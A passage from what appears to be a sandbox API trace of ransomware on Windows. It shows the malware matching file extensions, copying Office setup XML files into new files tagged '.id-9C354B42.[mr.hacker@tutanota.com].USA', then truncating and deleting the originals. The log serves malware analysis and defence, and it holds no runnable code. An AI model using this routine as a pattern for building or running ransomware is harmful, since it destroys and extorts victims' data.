hFile=0x1a8, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=2626) returned 1 [0036.701] CloseHandle (hObject=0x1a8) returned 1 [0036.701] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml")) returned 0x20 [0036.701] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.701] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0036.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0036.701] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0036.701] lstrlenW (lpString=".doc") returned 4 [0036.701] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.701] lstrlenW (lpString=".docx") returned 5 [0036.701] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0036.701] lstrlenW (lpString=".pdf") returned 4 [0036.701] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.701] lstrlenW (lpString=".xls") returned 4 [0036.701] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.701] lstrlenW (lpString=".xlsx") returned 5 [0036.701] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0036.702] lstrlenW (lpString=".ppt") returned 4 [0036.702] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0036.702] lstrlenW (lpString=".zip") returned 4 [0036.702] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.702] lstrlenW (lpString=".rar") returned 4 [0036.702] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.702] lstrlenW (lpString=".bz2") returned 4 [0036.702] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.702] lstrlenW (lpString=".7z") returned 3 [0036.702] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0036.702] lstrlenW (lpString=".dbf") returned 4 [0036.702] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0036.702] lstrlenW (lpString=".1cd") returned 4 [0036.702] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0036.702] lstrlenW (lpString=".jpg") returned 4 [0036.702] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0036.702] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0036.702] lstrlenW (lpString=".doc") returned 4 [0036.702] lstrcmpiW (lpString1=".doc", lpString2=".xml") returned -1 [0036.702] lstrlenW (lpString=".docx") returned 5 [0036.702] lstrcmpiW (lpString1=".docx", lpString2="d.xml") returned -1 [0036.702] lstrlenW (lpString=".pdf") returned 4 [0036.702] lstrcmpiW (lpString1=".pdf", lpString2=".xml") returned -1 [0036.702] lstrlenW (lpString=".xls") returned 4 [0036.702] lstrcmpiW (lpString1=".xls", lpString2=".xml") returned -1 [0036.702] lstrlenW (lpString=".xlsx") returned 5 [0036.702] lstrcmpiW (lpString1=".xlsx", lpString2="d.xml") returned -1 [0036.703] lstrlenW (lpString=".ppt") returned 4 [0036.703] lstrcmpiW (lpString1=".ppt", lpString2=".xml") returned -1 [0036.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0036.703] lstrlenW (lpString=".zip") returned 4 [0036.703] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0036.703] lstrlenW (lpString=".rar") returned 4 [0036.703] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0036.703] lstrlenW (lpString=".bz2") returned 4 [0036.703] lstrcmpiW (lpString1=".bz2", lpString2=".xml") returned -1 [0036.703] lstrlenW (lpString=".7z") returned 3 [0036.703] lstrcmpiW (lpString1=".7z", lpString2="xml") returned -1 [0036.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0036.703] lstrlenW (lpString=".dbf") returned 4 [0036.703] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0036.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0036.703] lstrlenW (lpString=".1cd") returned 4 [0036.703] lstrcmpiW (lpString1=".1cd", lpString2=".xml") returned -1 [0036.703] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsnld.xml") returned 61 [0036.703] lstrlenW (lpString=".jpg") returned 4 [0036.703] lstrcmpiW (lpString1=".jpg", lpString2=".xml") returned -1 [0036.703] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0036.703] lstrlenW (lpString="AccessMUISet.XML") returned 16 [0036.703] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0036.992] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=819) returned 1 [0036.992] CloseHandle (hObject=0x1d0) returned 1 [0036.992] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml")) returned 0x20 [0036.992] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0036.993] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0037.001] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.009] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.009] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1cc [0037.017] GetLastError () returned 0x0 [0037.017] ReadFile (in: hFile=0x1d0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x333, lpOverlapped=0x0) returned 1 [0037.211] WriteFile (in: hFile=0x1cc, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x340, lpOverlapped=0x0) returned 1 [0037.212] ReadFile (in: hFile=0x1d0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.212] WriteFile (in: hFile=0x1cc, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xf4, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xf4, lpOverlapped=0x0) returned 1 [0037.213] SetEndOfFile (hFile=0x1cc) returned 1 [0037.213] CloseHandle (hObject=0x1cc) returned 1 [0037.213] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.213] SetEndOfFile (hFile=0x1d0) returned 1 [0037.214] CloseHandle (hObject=0x1d0) returned 1 [0037.214] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.214] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\access.en-us\\accessmuiset.xml")) returned 1 [0037.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.214] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.214] lstrlenW (lpString=".doc") returned 4 [0037.215] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.215] lstrlenW (lpString=".docx") returned 5 [0037.215] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0037.215] lstrlenW (lpString=".pdf") returned 4 [0037.215] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.215] lstrlenW (lpString=".xls") returned 4 [0037.215] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.215] lstrlenW (lpString=".xlsx") returned 5 [0037.215] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0037.215] lstrlenW (lpString=".ppt") returned 4 [0037.215] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.215] lstrlenW (lpString=".zip") returned 4 [0037.215] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.215] lstrlenW (lpString=".rar") returned 4 [0037.215] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.215] lstrlenW (lpString=".bz2") returned 4 [0037.215] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.215] lstrlenW (lpString=".7z") returned 3 [0037.215] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.215] lstrlenW (lpString=".dbf") returned 4 [0037.215] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.215] lstrlenW (lpString=".1cd") returned 4 [0037.215] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.215] lstrlenW (lpString=".jpg") returned 4 [0037.215] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.215] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.215] lstrlenW (lpString=".doc") returned 4 [0037.216] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.216] lstrlenW (lpString=".docx") returned 5 [0037.216] lstrcmpiW (lpString1=".docx", lpString2="t.XML") returned -1 [0037.216] lstrlenW (lpString=".pdf") returned 4 [0037.216] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.216] lstrlenW (lpString=".xls") returned 4 [0037.216] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.216] lstrlenW (lpString=".xlsx") returned 5 [0037.216] lstrcmpiW (lpString1=".xlsx", lpString2="t.XML") returned -1 [0037.216] lstrlenW (lpString=".ppt") returned 4 [0037.216] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.216] lstrlenW (lpString=".zip") returned 4 [0037.216] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.216] lstrlenW (lpString=".rar") returned 4 [0037.216] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.216] lstrlenW (lpString=".bz2") returned 4 [0037.216] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.216] lstrlenW (lpString=".7z") returned 3 [0037.216] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.216] lstrlenW (lpString=".dbf") returned 4 [0037.216] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.216] lstrlenW (lpString=".1cd") returned 4 [0037.216] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.216] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Access.en-us\\AccessMUISet.XML") returned 109 [0037.216] lstrlenW (lpString=".jpg") returned 4 [0037.216] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.216] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0037.217] lstrlenW (lpString="InfoPathMUI.XML") returned 15 [0037.217] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0037.217] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1231) returned 1 [0037.217] CloseHandle (hObject=0x1d0) returned 1 [0037.217] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml")) returned 0x20 [0037.217] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0037.217] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0037.217] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.217] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.217] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0037.255] GetLastError () returned 0x0 [0037.255] ReadFile (in: hFile=0x1d0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x4cf, lpOverlapped=0x0) returned 1 [0037.260] WriteFile (in: hFile=0x1c4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x4d0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x4d0, lpOverlapped=0x0) returned 1 [0037.260] ReadFile (in: hFile=0x1d0, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0037.261] WriteFile (in: hFile=0x1c4, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xf2, lpOverlapped=0x0) returned 1 [0037.261] SetEndOfFile (hFile=0x1c4) returned 1 [0037.261] CloseHandle (hObject=0x1c4) returned 1 [0037.261] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.261] SetEndOfFile (hFile=0x1d0) returned 1 [0037.262] CloseHandle (hObject=0x1d0) returned 1 [0037.262] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0037.262] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\infopathmui.xml")) returned 1 [0037.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.263] lstrlenW (lpString=".doc") returned 4 [0037.263] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.263] lstrlenW (lpString=".docx") returned 5 [0037.263] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.263] lstrlenW (lpString=".pdf") returned 4 [0037.263] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.263] lstrlenW (lpString=".xls") returned 4 [0037.263] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.263] lstrlenW (lpString=".xlsx") returned 5 [0037.263] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.263] lstrlenW (lpString=".ppt") returned 4 [0037.263] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.263] lstrlenW (lpString=".zip") returned 4 [0037.263] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.263] lstrlenW (lpString=".rar") returned 4 [0037.263] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.263] lstrlenW (lpString=".bz2") returned 4 [0037.263] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.263] lstrlenW (lpString=".7z") returned 3 [0037.263] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.263] lstrlenW (lpString=".dbf") returned 4 [0037.263] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.263] lstrlenW (lpString=".1cd") returned 4 [0037.263] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.263] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.263] lstrlenW (lpString=".jpg") returned 4 [0037.264] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.264] lstrlenW (lpString=".doc") returned 4 [0037.264] lstrcmpiW (lpString1=".doc", lpString2=".XML") returned -1 [0037.264] lstrlenW (lpString=".docx") returned 5 [0037.264] lstrcmpiW (lpString1=".docx", lpString2="I.XML") returned -1 [0037.264] lstrlenW (lpString=".pdf") returned 4 [0037.264] lstrcmpiW (lpString1=".pdf", lpString2=".XML") returned -1 [0037.264] lstrlenW (lpString=".xls") returned 4 [0037.264] lstrcmpiW (lpString1=".xls", lpString2=".XML") returned -1 [0037.264] lstrlenW (lpString=".xlsx") returned 5 [0037.264] lstrcmpiW (lpString1=".xlsx", lpString2="I.XML") returned -1 [0037.264] lstrlenW (lpString=".ppt") returned 4 [0037.264] lstrcmpiW (lpString1=".ppt", lpString2=".XML") returned -1 [0037.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.264] lstrlenW (lpString=".zip") returned 4 [0037.264] lstrcmpiW (lpString1=".zip", lpString2=".XML") returned 1 [0037.264] lstrlenW (lpString=".rar") returned 4 [0037.264] lstrcmpiW (lpString1=".rar", lpString2=".XML") returned -1 [0037.264] lstrlenW (lpString=".bz2") returned 4 [0037.264] lstrcmpiW (lpString1=".bz2", lpString2=".XML") returned -1 [0037.264] lstrlenW (lpString=".7z") returned 3 [0037.264] lstrcmpiW (lpString1=".7z", lpString2="XML") returned -1 [0037.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.264] lstrlenW (lpString=".dbf") returned 4 [0037.264] lstrcmpiW (lpString1=".dbf", lpString2=".XML") returned -1 [0037.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.264] lstrlenW (lpString=".1cd") returned 4 [0037.264] lstrcmpiW (lpString1=".1cd", lpString2=".XML") returned -1 [0037.264] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\InfoPathMUI.XML") returned 110 [0037.264] lstrlenW (lpString=".jpg") returned 4 [0037.264] lstrcmpiW (lpString1=".jpg", lpString2=".XML") returned -1 [0037.265] lstrcmpiW (lpString1=".XML", lpString2=".USA") returned 1 [0037.265] lstrlenW (lpString="SETUP.XML") returned 9 [0037.265] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0037.265] GetFileSizeEx (in: hFile=0x1d0, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1852) returned 1 [0037.265] CloseHandle (hObject=0x1d0) returned 1 [0037.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml")) returned 0x20 [0037.265] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0037.265] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1d0 [0037.265] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.265] SetFilePointerEx (in: hFile=0x1d0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0037.265] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\InfoPath.en-us\\SETUP.XML.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\infopath.en-us\\setup.xml.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, 